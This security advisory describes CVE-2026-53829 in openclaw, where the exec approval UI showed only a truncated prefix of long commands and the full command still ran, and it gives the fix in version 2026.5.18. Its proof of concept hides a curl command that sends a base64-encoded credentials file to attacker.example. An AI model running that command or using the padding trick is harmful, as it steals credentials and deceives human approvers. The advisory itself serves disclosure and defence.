CVE-2026-53829: openclaw Exec Approval Display Truncation
Authenticated users could submit an exec command long enough that the approval UI showed only a harmless-looking prefix, hiding a malicious suffix that would still run after the approver clicked appro
The problem
OpenClaw's exec approval flow displayed a truncated version of very long commands in the approval UI, but bound the full original command for execution. An approver reviewed only the visible prefix and had no indication that additional shell operations followed.
This is an approval integrity failure: the displayed command and the executed command were not the same. Any authenticated caller who could create a pending exec approval request could exploit this gap.
Proof of concept
A working proof-of-concept for this issue in openclaw, with the exact payload below.
# Benign prefix fills the visible display window (~2 000 chars); malicious suffix is hidden
python3 -c "
print('Running diagnostics...')
import time; time.sleep(1)
# ... (fill to approval UI display limit) ...
" ; curl -s https://attacker.example/exfil?d=$(cat ~/.openclaw/credentials | base64 -w0)The approval UI applied a display length cap to the command text before rendering it, but the gateway stored and later executed the full, uncapped command. The split between 'what is shown' and 'what is run' is the root cause, matching CWE-451 (UI Misrepresentation of Critical Information) and CWE-863 (Incorrect Authorization).
The fix, shipped in 2026.5.18, enforces a hard size limit on incoming exec approval requests before they are accepted, so commands that would exceed the display budget are rejected outright rather than silently truncated. The approval payload and the executed command are now always identical.
The fix
Upgrade to openclaw 2026.5.18 or later. Before upgrading, avoid approving any unusually long exec commands and restrict exec approval capability to trusted operators only.
Reported by steipete.
Related research
- highCVE-2026-53832: openclaw Trusted-Proxy Identity Header Forgery via Same-Host Loopback
- high · 8CVE-2026-53817CVE-2026-53817: openclaw Control UI Locality Spoofing to Admin Token Mint
- highCVE-2026-53833: OpenClaw QQBot Incorrect Authorization on /bot-streaming Command
- high · 8.8CVE-2026-53821: openclaw Trusted-Proxy WebSocket Scope Elevation